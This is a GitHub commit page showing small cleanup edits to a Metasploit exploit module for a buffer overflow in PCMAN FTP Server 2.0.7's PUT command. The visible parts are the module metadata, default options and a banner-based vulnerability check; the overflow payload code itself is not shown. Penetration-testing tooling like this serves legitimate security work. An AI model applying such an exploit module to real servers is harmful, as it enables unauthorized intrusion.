Skip to content

Commit 2df458c

Browse files
committed
Few updates per OJ and wvu
1 parent 3cab270 commit 2df458c

File tree

1 file changed

+7
-8
lines changed

1 file changed

+7
-8
lines changed

modules/exploits/windows/ftp/pcman_put.rb

Lines changed: 7 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -5,23 +5,23 @@
55

66
require 'msf/core'
77

8-
class Metasploit3 < Msf::Exploit::Remote
8+
class Metasploit4 < Msf::Exploit::Remote
99
Rank = NormalRanking
1010

1111
include Msf::Exploit::Remote::Ftp
1212

1313
def initialize(info = {})
1414
super(update_info(info,
15-
'Name' => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command',
15+
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
1616
'Description' => %q{
1717
This module exploits a buffer overflow vulnerability found in the PUT command of the
1818
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
1919
credientials are enabled.
2020
},
2121
'Author' =>
2222
[
23-
'Jay Turla @shipcod3', # Initial Discovery
24-
'Chris Higgins @ch1gg1ns' # msf Module
23+
'Jay Turla', # Initial Discovery -- @shipcod3
24+
'Chris Higgins' # msf Module -- @ch1gg1ns
2525
],
2626
'License' => MSF_LICENSE,
2727
'References' =>
@@ -30,8 +30,7 @@ def initialize(info = {})
3030
],
3131
'DefaultOptions' =>
3232
{
33-
'EXITFUNC' => 'process',
34-
'VERBOSE' => true
33+
'EXITFUNC' => 'process'
3534
},
3635
'Payload' =>
3736
{
@@ -57,9 +56,9 @@ def check
5756
disconnect
5857

5958
if /220 PCMan's FTP Server 2\.0/ === banner
60-
return Exploit::CheckCode::Appears
59+
Exploit::CheckCode::Appears
6160
else
62-
return Exploit::CheckCode::Safe
61+
Exploit::CheckCode::Safe
6362
end
6463
end
6564

0 commit comments

Comments
 (0)